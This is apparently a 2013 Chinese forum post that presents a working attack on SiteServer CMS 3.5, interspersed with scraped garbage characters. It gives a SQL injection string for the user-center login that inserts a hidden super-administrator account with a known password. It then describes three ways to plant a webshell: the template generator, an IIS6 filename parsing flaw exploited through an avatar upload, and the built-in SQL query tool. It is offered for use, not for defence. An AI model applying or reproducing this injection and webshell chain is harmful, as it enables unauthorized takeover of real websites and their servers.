经测试秒杀最新的3.5版
5 L+ O# g! m9 k1 Dstieserver官网:www.siteserver.cn4 K1 q9 k. j2 j0 G( R0 _% e9 A
EXP:
6 `: O% m/ W9 a) }5 t( z! c- L直接访问UserCenter/login.aspx7 x; \3 Q( j3 b) r9 b
用户名处输入:
& M) y4 C* L. f) a# T) X6 _4 a
( W* L" y. J. \) N123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–
$ G/ y, E i: Y4 @1 A# x3 T) i2 u密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。# L$ x1 L9 A b, o7 I. w
之后再访问后台SiteServer/login.aspx用插入的用户登陆
: f T. R4 r4 B3 ]) Y后台拿webshell的三种方法:
) w& q7 w& ]* t- o& Y一、& M/ [! `! C2 F) M
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx, H# {/ a3 G3 p9 B& n \
二、
9 |4 k3 ~5 _& g6 {, b4 J成员权限-》添加用户-》用户名为:1.asp
+ c9 W+ l( w, L' v% \. h7 _, i/ Whttp://127.0.0.1/usercenter/
. D4 q* R( S5 o) `) v用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell% W3 L1 t; i$ Z% A
(ps:后台添加用户时不会验证是否含有非法字符)
4 t0 {7 X8 N$ K8 ~9 ]+ I: p8 p三、
; {' k) t4 |* K: S Y1 C系统工具-》实用工具-》机器参数查看
/ w# Q5 v. t$ a# v$ _可以看到数据库类型、名称,WEB路径
' u9 Q n r, _- {, D: `& f系统工具-》数据库工具-》SQL语句查询
3 U9 S* z# X5 i% W. m这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |
发表于 2013-2-16 21:40:46
收藏
支持
反对